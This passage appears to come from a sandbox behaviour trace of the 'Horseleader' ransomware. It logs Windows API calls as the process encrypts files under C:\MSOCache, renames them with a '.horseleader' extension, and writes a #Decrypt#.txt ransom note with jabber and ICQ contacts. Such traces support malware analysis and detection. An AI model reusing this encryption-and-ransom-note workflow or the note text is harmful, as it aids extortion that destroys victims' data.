hFile=0x21c, liDistanceToMove=0x5b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.156] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.176] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.178] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.178] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.179] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.179] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.179] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.180] CloseHandle (hObject=0x21c) returned 1 [0212.180] GetProcessHeap () returned 0x780000 [0212.180] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.horseleader") returned 88 [0212.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.horseleader")) returned 1 [0212.181] GetProcessHeap () returned 0x780000 [0212.181] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.181] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0212.181] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0212.182] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0212.182] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0212.182] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0212.182] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0212.182] lstrlenW (lpString=".testttjffg") returned 11 [0212.182] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0212.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.182] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.182] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0212.182] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0212.182] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9352) returned 1 [0212.183] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2488, lpOverlapped=0x0) returned 1 [0212.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2488, lpOverlapped=0x0) returned 1 [0212.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.200] CloseHandle (hObject=0x21c) returned 1 [0212.200] GetProcessHeap () returned 0x780000 [0212.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.200] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0212.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0212.201] GetProcessHeap () returned 0x780000 [0212.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.201] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0212.201] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Windows") returned -1 [0212.201] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0212.201] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".horseleader") returned 0x0 [0212.202] lstrcmpW (lpString1="ShellUI.MST", lpString2="#Decrypt#.txt") returned 1 [0212.202] lstrcmpW (lpString1="ShellUI.MST", lpString2="_uninstalling_.png") returned 1 [0212.202] lstrlenW (lpString=".testttjffg") returned 11 [0212.202] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpSrch=".testttjffg") returned 0x0 [0212.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.202] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.202] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.202] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0212.202] StrStrW (lpFirst="ShellUI.MST", lpSrch=".txt") returned 0x0 [0212.203] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3584) returned 1 [0212.203] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xe00, lpOverlapped=0x0) returned 1 [0212.208] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.208] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xe00, lpOverlapped=0x0) returned 1 [0212.208] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.208] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.209] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.209] CloseHandle (hObject=0x21c) returned 1 [0212.209] GetProcessHeap () returned 0x780000 [0212.209] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.209] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.horseleader") returned 90 [0212.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.horseleader")) returned 1 [0212.211] GetProcessHeap () returned 0x780000 [0212.211] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.211] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0212.211] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0212.211] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0212.211] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0212.212] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0212.212] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0212.213] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0212.214] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0212.214] CloseHandle (hObject=0x1cc) returned 1 [0212.214] GetProcessHeap () returned 0x780000 [0212.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0212.214] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0212.214] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0212.214] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 66 [0212.214] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0212.214] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0212.214] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0212.214] GetProcessHeap () returned 0x780000 [0212.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0212.215] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned 68 [0212.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0212.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0212.219] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0212.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0212.220] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0212.220] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0212.220] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0212.220] lstrlenW (lpString=".testttjffg") returned 11 [0212.220] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0212.220] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.220] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.220] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.220] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0212.221] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0212.221] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0212.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0212.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0212.221] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0212.221] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0212.221] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0212.221] lstrlenW (lpString=".testttjffg") returned 11 [0212.221] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0212.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.221] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.221] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0212.222] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0212.222] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 79 [0212.222] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0212.222] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0212.222] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0212.222] GetProcessHeap () returned 0x780000 [0212.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.222] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned 81 [0212.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 